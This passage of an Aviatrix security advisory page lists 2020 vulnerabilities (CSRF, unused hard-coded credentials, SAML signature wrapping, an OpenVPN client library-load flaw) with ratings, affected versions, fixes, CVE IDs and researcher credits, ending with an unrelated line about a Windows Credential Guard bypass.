**Solution** Client VPN upgrade to 2.10.7 Controller & Gateway upgrade to 5.3 or later In Controller, customer must configure OpenVPN minimum client version to 2.10.7

**CVE-ID** CVE-2020-13417

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**5\. Cross Site Request Forgery (CSRF)¶**

**Date** 5/12/2020

**Risk Rating** Critical

**Description** An API call on Aviatrix Controller web interface was found missing session token check to control access.

**Impact** Application may be vulnerable to Cross Site Request Forgery (CSRF)

**Affected Product** Aviatrix Controller with software release 5.3 or earlier

**Solution** Controller & Gateway upgrade 5.4.1204 (5/8/2020) or later

**CVE-ID** CVE-2020-13412

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**4\. Hard Coded Credentials¶**

**Date** 1/16/2020

**Risk Rating** Low

**Description** The Aviatrix Cloud Controller contains credentials unused by the software. This is a clean-up effort implemented to improve on operational and security maintenance.

**Impact** This would impact operation and maintenance complexity.

**Affected Product** Aviatrix Controller 5.3 or lower

**Solution** Controller & Gateway upgrade 5.4.1204 (5/8/2020) or later Recommended: AWS Security Group settings grants only authorized Controller Access in your environment

**CVE-ID** CVE-2020-13414

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

**3\. CSRF on Password Reset¶**

**Date** 1/16/2020

**Risk Rating** Medium

**Description** Controller Web Interface session token parameter is not required on an API call, which opens the application up to a Cross Site Request Forgery (CSRF) vulnerability.

**Impact** Vulnerability could lead to the unintended reset of a user’s password.

**Affected Product** Aviatrix Controller 5.3 or lower

**Solution** Upgrade 5.4.1066 (must be on version is 5.0 or above) Make sure your AWS Security Group settings limit authorized Controller Access only

**CVE-ID** CVE-2020-13416

**2\. XML Signature Wrapping in SAML¶**

**Date** 2/26/2020

**Risk Rating** High

**Description** An attacker with any signed SAML assertion from the Identity Provider can establish a connection (even if that SAML assertion has expired or is from a user who is not authorized to access Aviatrix).

**Impact** Aviatrix customer using SAML

**Affected Product** Aviatrix Controller 5.1 or lower

**Solution** Aviatrix Controller 5.2 or later Plus Security Patch “SAML XML signature wrapping vulnerability”

**CVE-ID** CVE-2020-13415

**Acknowledgement** Aviatrix is pleased to thank Ioannis Kakavas from Elastic for reporting this vulnerability under responsible disclosure.

**1\. OpenVPN Client Arbitrary File Write¶**

**Date** 1/16/2020

**Risk Rating** High

**Description** Aviatrix OpenVPN client through 2.5.7 or older on Linux, MacOS, and Windows is vulnerable when OpenSSL parameters are altered from the issued value set; the parameters could allow unauthorized third-party libraries to load.

**Impact** OpenVPN client on Linux, MacOS, and Windows

**Affected Product** OpenVPN Client 2.5.7

**Solution** Upgrade to VPN client v2.6 or later

**CVE-ID** CVE-2020-7224

**Acknowledgement** Aviatrix is pleased to thank Rich Mirch, Senior Adversarial Engineer - TeamARES from Critical Start, Inc. for reporting this vulnerability under responsible disclosure.

CVE-2022-38368: PSIRT Advisories — aviatrix_docs documentation

Windows Defender Credential Guard Security Feature Bypass Vulnerability. This CVE ID is unique from CVE-2022-34709.

Tag

#windows